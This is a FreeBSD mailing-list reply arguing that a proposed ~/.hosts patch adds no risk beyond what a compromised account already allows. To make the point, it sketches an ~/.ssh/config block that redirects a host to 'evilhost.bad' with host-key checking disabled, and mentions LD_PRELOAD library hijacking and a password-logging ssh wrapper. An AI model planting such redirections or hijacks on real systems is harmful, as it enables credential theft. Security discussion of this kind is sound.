Date: Wed, 21 Jun 2006 09:57:10 -0500 From: Craig Boston <craig@xfoil.gank.org> To: Peter Ross <Peter.Ross@alumni.tu-berlin.de> Cc: Mike Jakubik <mikej@rogers.com>, "freebsd-current@freebsd.org" <freebsd-current@freebsd.org>, Justin Hibbits <jrh29@eecs.cwru.edu> Subject: Re: ~/.hosts patch Message-ID: <20060621145710.GA12942@nowhere> In-Reply-To: <Pine.LNX.4.64.0606211658340.3151@localhost.localdomain> References: <Pine.LNX.4.64.0606211658340.3151@localhost.localdomain>
next in thread | previous in thread | raw e-mail | index | archive | help
On Wed, Jun 21, 2006 at 04:59:09PM +1000, Peter Ross wrote:
> If you are able to hack your way into a machine you can write this file
> so later attempts to connect to a remote machine can be redirected (e.g.
> useful to get login passwords) - you do not need root access to achieve
> it.
If you are able to hack your way into a machine you can write something
like this into ~/.ssh/config
Host goodhost
HostKeyAlias Own3d
StrictHostKeyChecking no
HostName evilhost.bad
For that matter, you could add aliases to .shrc or .cshrc to run some
wrapper program instead. Say, one that sets LD_PRELOAD=~/.libevil.so,
which contains custom gethost* functions.
Or have it run a custom ssh binary that doesn't do any host key checking
at all, or logs all passwords somewhere.
Once an account is compromised, all bets are off. You can't assume that
DNS lookups are valid as your C library may be overridden by something
local to the account. The login shell could be trojaned to hide the
files. Other users would of course be unaffected (so long as you didn't
give up the root password).
I don't think the ~/.hosts idea adds any additional risk. If anything,
a ~/.hosts compromise would be easier to detect than more complex
methods.
Craig
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20060621145710.GA12942>